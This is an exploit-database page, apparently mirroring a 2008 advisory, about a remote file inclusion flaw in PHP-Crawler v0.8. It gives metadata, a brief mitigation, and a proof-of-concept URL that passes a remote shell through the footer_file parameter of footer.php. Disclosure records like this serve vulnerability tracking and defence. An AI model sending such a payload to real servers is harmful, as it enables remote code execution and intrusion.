header-logo
Suggest Exploit
vendor:
PHP-Crawler
by:
Piker
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: PHP-Crawler
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE: N/A
CPE: a:php-crawler:php-crawler:0.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Crawler v0.8 Remote File Inclusion Vulnerability

A vulnerability in PHP-Crawler v0.8 allows remote attackers to include arbitrary files via a URL in the footer_file parameter to footer.php.

Mitigation:

Input validation should be used to prevent the inclusion of files from external sources.
Source

Exploit-DB raw data:

################## Piker #######################################
#
#
#    PHP-Crawler v0.8 Remote File Inclusion Vulnerability
#
#
#    Affected software: PHP-Crawler 0.8
#    Vendor: http://sourceforge.net/projects/php-crawler/
#    Risk: Critical
#
################################################################
#
#    http://[target]/[path]/footer.php?footer_file=[SHELL]
#
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]
#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# milw0rm.com [2008-09-17]

Navigation

Suggest Exploit

Services By CQR